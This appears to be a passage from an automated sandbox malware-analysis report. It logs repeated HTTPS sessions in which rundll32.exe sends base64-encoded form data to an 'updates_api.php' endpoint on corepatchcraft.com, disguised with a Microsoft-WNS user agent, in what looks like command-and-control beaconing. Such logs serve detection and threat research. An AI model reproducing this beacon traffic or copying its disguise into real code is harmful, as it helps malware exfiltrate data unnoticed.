                        2025-01-16 05:03:07 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:08 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:08 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:08 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        54192.168.2.66443194.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:09 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:09 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:09 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:09 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:09 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        55192.168.2.66443294.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:10 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:10 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:11 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:10 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:11 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        56192.168.2.66443394.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:11 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:11 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:12 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:12 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:12 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        57192.168.2.66443494.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:13 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:13 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:13 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:13 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:13 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        58192.168.2.66443594.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:14 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:14 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:15 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:14 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:15 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        59192.168.2.66443694.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:16 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:16 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:16 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:16 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:16 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        60192.168.2.66443794.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:17 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:17 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:17 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:17 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:17 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        61192.168.2.66443894.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:18 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:18 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:19 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:18 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:19 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        62192.168.2.66443994.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:19 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:19 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:20 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:20 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:20 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        63192.168.2.66444094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:21 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:21 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:21 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:21 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:21 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        64192.168.2.66444194.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:22 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
